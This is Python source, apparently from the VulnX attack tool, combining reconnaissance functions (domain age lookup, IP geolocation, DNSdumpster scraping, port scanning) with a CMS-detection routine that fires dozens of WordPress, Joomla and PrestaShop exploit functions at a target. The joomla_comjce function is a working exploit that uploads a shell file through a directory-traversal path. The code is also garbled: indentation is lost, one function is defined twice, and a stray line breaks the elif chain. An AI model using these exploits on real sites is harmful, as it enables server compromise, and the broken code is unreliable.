def web_host(self):
urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(
self.url)
getinfo = requests.get(urldate, self.headers).text
regex_date = r'Date: (.+?)-(.+?)'
regex_date = re.compile(regex_date)
matches = re.search(regex_date, getinfo)
try:
if matches:
print(' {0} Domain Created on : {1}'.format(
good, matches.group(1)))
ip = socket.gethostbyname(hostd(self.url))
print(' {0} CloudFlare IP : {1}'.format(good, ip))
ipinfo = "http://ipinfo.io/" + ip + "/json"
gather = requests.get(ipinfo, self.headers).text
self.match_printer(
'Country', self.match_info(r'country\": \"(.+?)\"',
gather))
self.match_printer(
'Region', self.match_info(r'region\": \"(.+?)\"', gather))
self.match_printer(
'Timezone',
self.match_info(r'timezone\": \"(.+?)\"', gather))
self.match_printer(
'Postal', self.match_info(r'postal\": \"(.+?)\"', gather))
self.match_printer(
'Org', self.match_info(r'org\": \"(.+?)\"', gather))
self.match_printer(
'Location', self.match_info(r'loc\": \"(.+?)\"', gather))
except Exception as err:
print(' {0} Parse Error : {1}'.format(bad, err))
def domain_info(url):
domain = hostd(url)
dnsdumpster_url = 'https://dnsdumpster.com/'
response = requests.Session().get(dnsdumpster_url).text
csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'",
response).group(1)
cookies = {'csrftoken': csrf_token}
headers = {'Referer': 'https://dnsdumpster.com/'}
data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain}
response = requests.Session().post('https://dnsdumpster.com/',
cookies=cookies,
data=data,
headers=headers)
image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain)
if response.status_code == 200:
soup = BeautifulSoup(response.content, 'html.parser')
tables = soup.findAll('table')
res = {}
res['domain'] = domain
res['dns_records'] = {}
res['dns_records']['host'] = results(tables[3])
print(' %s SubDomains' % que)
for entry in res['dns_records']['host']:
print((
" %s SubDomain : {domain} \n %s IP : {ip} \n %s----------------%s"
.format(**entry) % (good, good, bannerblue, end)))
def dnsdumper(url):
domain = hostd(url)
dnsdumpster_url = 'https://dnsdumpster.com/'
response = requests.Session().get(dnsdumpster_url).text
# If no match is found, the return object won't have group method, so check.
try:
csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response).group(1)
except AttributeError: # No match is found
csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response)
print (' %s Retrieved token: %s' % (info,csrf_token))
cookies = {'csrftoken': csrf_token}
headers = {'Referer': 'https://dnsdumpster.com/'}
data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain }
response = requests.Session().post('https://dnsdumpster.com/',cookies=cookies, data=data, headers=headers)
image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain)
if response.status_code == 200:
soup = BeautifulSoup(response.content, 'html.parser')
tables = soup.findAll('table')
res = {}
res['domain'] = domain
res['dns_records'] = {}
res['dns_records']['dns'] = results(tables[0])
res['dns_records']['mx'] = results(tables[1])
print(' %s Search for DNS Servers' % que)
for entry in res['dns_records']['dns']:
print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s".format(**entry)% (good,good,good,bannerblue,end)))
print(' %s Search for MX Records ' % que)
for entry in res['dns_records']['mx']:
print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s".format(**entry)% (good,good,good,bannerblue,end)))
def portscan(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.port:
result = sock.connect_ex((hostd(self.url), self.port))
if result == 0:
print(' {} {} {} {}'.format(
que, self.port, portopen, portsobject[self.port]))
else:
print(' {} {} {} {}'.format(
que, self.port, portclose, portsobject[self.port]))
def dnsdumper(url):
'''
For DNS Dump you retrieve token from dnsdumpster.
V T X
| / | /
| / | /
U -> N
| / Parsing data from records
| / MX , Domains , DNS , MAILS
L
Schema V, returns set of (U, L, N, T, X)
'''
domain = hostd(url)
dnsdumpster_url = 'https://dnsdumpster.com/'
response = requests.Session().get(dnsdumpster_url, verify=False)
soup = BeautifulSoup(response.text, 'html.parser')
# If no match is found, the return object won't have group method, so check.
try:
csrf_token = soup.findAll('input',
attrs={'name':
'csrfmiddlewaretoken'})[0]['value']
except AttributeError: # No match is found
csrf_token = soup.findAll('input',
attrs={'name':
'csrfmiddlewaretoken'})[0]['value']
print(' %s Retrieved token: %s' % (info, csrf_token))
cookies = {'csrftoken': csrf_token}
headers = {'Referer': 'https://dnsdumpster.com/'}
data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain}
response = requests.Session().post('https://dnsdumpster.com/',
cookies=cookies,
data=data,
headers=headers,
verify=False)
image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain,
verify=False)
if response.status_code == 200:
soup = BeautifulSoup(response.content, 'html.parser')
tables = soup.findAll('table')
res = {}
res['domain'] = domain
res['dns_records'] = {}
res['dns_records']['dns'] = results(tables[0])
res['dns_records']['mx'] = results(tables[1])
print(' %s Search for DNS Servers' % que)
for entry in res['dns_records']['dns']:
print((
" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s"
.format(**entry) % (good, good, good, bannerblue, end)))
print(' %s Search for MX Records ' % que)
for entry in res['dns_records']['mx']:
print((
" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s"
.format(**entry) % (good, good, good, bannerblue, end)))
def webhosting_info(hostinfo):
print (' %s Web Hosting Information' % (run))
urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url)
getinfo = requests.get(urldate,headers).text
regex_date = r'Date: (.+?)-(.+?)'
regex_date = re.compile(regex_date)
matches = re.search(regex_date,getinfo)
if matches:
print ( ' %s Domain Created on : %s' % (good,matches.group(1)))
try:
ip = socket.gethostbyname(hostd(url))
print ( ' %s CloudFlare IP : %s' % (good,ip))
ipinfo = "http://ipinfo.io/" + ip + "/json"
getipinfo = requests.get(ipinfo,headers).text
country = re.search(re.compile(r'country\": \"(.+?)\"'),getipinfo)
region = re.search(re.compile(r'region\": \"(.+?)\"'),getipinfo)
latitude = re.search(re.compile(r'latitude: (.+?)'),getipinfo)
longitude = re.search(re.compile(r'longitude\": \"(.+?)\"'),getipinfo)
timezone = re.search(re.compile(r'timezone\": \"(.+?)\"'),getipinfo)
ans = re.search(re.compile(r'ans\": \"(.+?)\"'),getipinfo)
org = re.search(re.compile(r'org\": \"(.+?)\"'),getipinfo)
if country:
print(' %s Country : %s' % (good,country.group(1)))
if region:
print(' %s Region : %s' % (good,region.group(1)))
if latitude:
print(' %s Latitude : %s' % (good,latitude.group(1)))
if longitude:
print(' %s Longitude : %s' % (good,longitude.group(1)))
if timezone:
print(' %s Timezone : %s' % (good,timezone.group(1)))
if ans:
print(' %s Ans : %s' % (good,ans.group(1)))
if org:
print(' %s Org : %s' % (good,org.group(1)))
print ("-----------------------------------------------")
except Exception as converterror:
print(' %s Error to get ip for this web ' % (bad))
def joomla_comjce(url, headers, timeout):
host = hostd(url)
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
data = {
'upload-dir': './../../',
'upload-overwrite': 0,
'Filedata': [open('./shell/VulnX.gif', 'rb')],
'action': 'Upload',
}
content = vxpost(endpoint, data, headers, timeout)
path_shell = url + "/VulnX.gif"
res = requests.get(path_shell, headers).text
matches = re.findall(re.compile(r'/image/gif/'), res)
if matches:
print(' %s Com Jce %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s Com Jce %s' % (que, failexploit))
def detect_cms():
lm = url + '/smiley/1.gif'
lm_content = requests.get(lm,headers).text
lm2 = url + '/rss.xml'
lm2_content = requests.get(lm2,headers).text
content=requests.get(url,headers).text
# try:
############################
# #
# joomla #
# #
############################
#joomla searching content to detect.
if re.search(re.compile(r'<script type=\"text/javascript\" src=\"/media/system/js/mootools.js\"></script>|/media/system/js/|com_content|Joomla!'), content):
print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
print ('------------------------------------------------')
print (' %s looking for cms' % (que))
print (' %s %sCMS :%s Joomla' % (good,W,end))
print ('------------------------------------------------')
#webinfo gathering argument
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
print (' %s Starting searching for Subdomains' %(run))
domain_info(url)
if cms == 'version':
print (' %s CMS informations gathering' %(run))
joo_version(url,headers)
print ("-----------------------------------------------")
if cms == 'all':
print (' %s CMS informations gathering' %(run))
joo_version(url,headers)
joo_user(url,headers)
joo_template(url,headers)
print ("-----------------------------------------------")
#port to scan
if scanports:
print (' %s Scanning Ports' %(run))
print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W))
portscan(hostd(url))
print ("-----------------------------------------------")
if dnsdump:
print (' %s Starting DNS dump' %(run))
dnsdumper(url)
print ("-----------------------------------------------")
#joomla_exploits imported from folder[./common/joomla_exploits.py]
if exploit:
print (' %s Check Vulnerability' %(run))
print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W))
joomla_comjce(url,headers,timeout)
joomla_comedia(url,headers,timeout)
joomla_comjdownloads(url,headers,timeout)
joomla_comjdownloads2(url,headers,timeout)
joomla_fabrik2(url,headers,timeout)
joomla_fabrik2_d(url,headers,timeout)
joomla_foxcontact(url,headers,timeout)
############################
# #
# Wordpress #
# #
############################
#wordpress searching content to detect.
elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content):
print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
print ('------------------------------------------------')
print (' %s looking for cms' % (que))
print (' %s %sCMS :%s Wordpress' % (good,W,end))
print ('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
if domaininfo:
print (' %s Starting searching for Subdomains' %(run))
domain_info(url)
#wp_grab methods info from (folder)[./common/grapwp.py]
if cms == 'version':
print (' %s CMS informations gathering' %(run))
wp_version(url,headers,grabinfo)
print ("-----------------------------------------------")
if cms == 'themes':
print (' %s CMS informations gathering' %(run))
wp_themes(url,headers,grabinfo)
print ("-----------------------------------------------")
if cms == 'user':
print (' %s CMS informations gathering' %(run))
wp_user(url,headers,grabinfo)
print ("-----------------------------------------------")
if cms == 'plugins':
print (' %s CMS informations gathering' %(run))
wp_plugin(url,headers,grabinfo)
print ("-----------------------------------------------")
if cms == 'all':
print (' %s CMS informations gathering' %(run))
wp_version(url,headers,grabinfo)
wp_themes(url,headers,grabinfo)
wp_user(url,headers,grabinfo)
wp_plugin(url,headers,grabinfo)
print ("-----------------------------------------------")
#port to scan
if scanports:
print (' %s Scanning Ports' %(run))
print (""" %sPORTS %sSTATUS %sPROTO"""%(W,W,W))
portscan(hostd(url))
print ("-----------------------------------------------")
if dnsdump:
print (' %s Starting DNS dump' %(run))
dnsdumper(url)
print ("-----------------------------------------------")
# vulnx -u http://example.com -e | vulnx -u http://example --exploit
if exploit:
print (' %s Check Vulnerability\n' %(run))
print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W))
#wp_exploit methods from (dolder)[./common/wp_exploits.py]
wp_wysija(url,headers,vulnresults)
wp_blaze(url,headers,vulnresults)
wp_synoptic(url,headers,vulnresults)
wp_catpro(url,headers,vulnresults)
wp_cherry(url,headers,vulnresults)
wp_dm(url,headers,vulnresults)
wp_fromcraft(url,headers,vulnresults)
wp_jobmanager(url,headers,vulnresults)
wp_showbiz(url,headers,vulnresults)
wp_shop(url,headers,vulnresults)
wp_powerzoomer(url,headers,vulnresults)
wp_revslider(url,headers,vulnresults)
wp_adsmanager(url,headers,vulnresults)
wp_inboundiomarketing(url,headers,vulnresults)
wp_adblockblocker(url,headers,vulnresults)
wp_levoslideshow(url,headers,vulnresults)
print ("-----------------------------------------------")
############################
# #
# Drupal #
# #
############################
#drupal searching content to detect.
elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content):
print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
print ('------------------------------------------------')
print (' %s looking for cms' % (que))
print (' %s CMS : Drupal' % (good))
print ('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
print (' %s Starting searching for Subdomains' %(run))
domain_info(url)
if cms == 'version':
print (' %s CMS informations gathering' %(run))
drupal_version()
if scanports:
print (' %s Scanning Ports\n' %(run))
print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W))
portscan(hostd(url))
print ("-----------------------------------------------")
if dnsdump:
print (' %s Starting DNS dump ' %(run))
dnsdumper(url)
print ("-----------------------------------------------")
if exploit:
print (' %s Check Vulnerability\n' %(run))
print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W))
############################
# #
# Prestashop #
# #
############################
#prestashop searching content to detect.
elif re.search(re.compile(r'Prestashop|prestashop'), content):
print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
print ('------------------------------------------------')
print (' %s looking for cms' % (que))
print (' %s %sCMS :%s Prestashop' % (good,W,end))
print ('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
print (' %s Starting searching for Subdomains' %(run))
domain_info(url)
if cms == 'version':
print (' %s CMS informations gathering' %(run))
prestashop_version()
if scanports:
print (' %s Scanning Ports\n' %(run))
print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W))
portscan(hostd(url))
print ("-----------------------------------------------")
if dnsdump:
print (' %s Starting DNS dump ' %(run))
dnsdumper(url)
print ("-----------------------------------------------")
if exploit:
print (' %s Check Vulnerability\n' %(run))
print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W))
columnadverts(url,headers)
soopabanners(url,headers)
vtslide(url,headers)
simpleslideshow(url,headers)
productpageadverts(url,headers)
productpageadvertsb(url,headers)
jro_homepageadvertise(url,headers)
attributewizardpro(url,headers)
oneattributewizardpro(url,headers)
attributewizardpro_old(url,headers)
attributewizardpro_x(url,headers)
advancedslider(url,headers)
cartabandonmentpro(url,headers)
cartabandonmentpro_old(url,headers)
videostab(url,headers)
wg24themeadministration(url,headers)
fieldvmegamenu(url,headers)
wdoptionpanel(url,headers)
pk_flexmenu(url,headers)
nvn_export_orders(url,headers)
tdpsthemeoptionpanel(url,headers)
masseditproduct(url,headers)
############################
# #
# OpenCart #
# #
############################
#opencart searching content to detect.
elif re.search(re.compile(r'route=product|OpenCart|route=common|catalog/view/theme'), content):
print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
print ('------------------------------------------------')
print (' %s looking for cms' % (que))
print (' %s CMS : OpenCart' % (good))
print ('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
print (' %s Starting searching for Subdomains' %(run))
domain_info(url)
if cms == 'version':
print (' %s CMS informations gathering' %(run))
if scanports:
print (' %s Scanning Ports\n' %(run))
print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W))
portscan(hostd(url))
print ("-----------------------------------------------")
if dnsdump:
print (' %s Starting DNS dump ' %(run))
dnsdumper(url)
print ("-----------------------------------------------")
if exploit:
print (' %s Check Vulnerability\n' %(run))
print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W))
############################
# #
# Magento #
# #
############################
#magento searching content to detect.
elif re.search(re.compile(r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'), content):
print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
print ('------------------------------------------------')
print (' %s looking for cms' % (que))
print (' %s CMS : Magento' % (good))
print ('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
print (' %s Starting searching for Subdomains' %(run))
domain_info(url)
if cms == 'version':
print (' %s CMS informations gathering' %(run))
if scanports:
print (' %s Scanning Ports\n' %(run))
print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W))
portscan(hostd(url))
print ("-----------------------------------------------")
if dnsdump:
print (' %s Starting DNS dump ' %(run))
dnsdumper(url)
print ("-----------------------------------------------")
if exploit:
print (' %s Check Vulnerability' %(run))
print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W))
############################
# #
# Lokomedia #
# #
############################
#lokomedia searching content to detect.
print (' %s Check Vulnerability' %(run))
elif re.search(re.compile(r'image/gif'), lm_content):
print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
print ('------------------------------------------------')
print (' %s looking for cms' % (que))
print (' %s CMS : Lokomedia' % (good))
print ('------------------------------------------------')
if subdomains:
print (' %s Starting searching for Subdomains' %(run))
domain_info(url)
print ('------------------------------------------------')
if scanports:
print (' %s Scanning Ports\n' %(run))
print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W))
portscan(hostd(url))
print ("-----------------------------------------------")
if dnsdump:
print (' %s Starting DNS dump ' %(run))
dnsdumper(url)
print ("-----------------------------------------------")
print (' %s Check Vulnerability' %(run))
elif re.search(re.compile(r'lokomedia'), lm2_content):
print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
print ('------------------------------------------------')
print (' %s looking for cms' % (que))
print (' %s CMS : Lokomedia' % (good))
print ('------------------------------------------------')
if subdomains:
print (' %s Starting searching for Subdomains' %(run))
domain_info(url)
if scanports:
print (' %s Scanning Ports\n' %(run))
print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W))
portscan(hostd(url))
print ("-----------------------------------------------")
if dnsdump:
print (' %s Starting DNS dump ' %(run))
dnsdumper(url)
print ("-----------------------------------------------")
print (' %s Check Vulnerability' %(run))
############################
# #
# Unknown #
# #
############################
#no cms detect
else:
print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
print ('------------------------------------------------')
print (' %s looking for cms' % (que))
print (' %s CMS : Unknown' % (bad))
print ('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
print (' %s Starting searching for Subdomains' %(run))
domain_info(url)
print ("-----------------------------------------------")
if dnsdump:
print (' %s Starting DNS dump ' %(run))
dnsdumper(url)
print ("-----------------------------------------------")
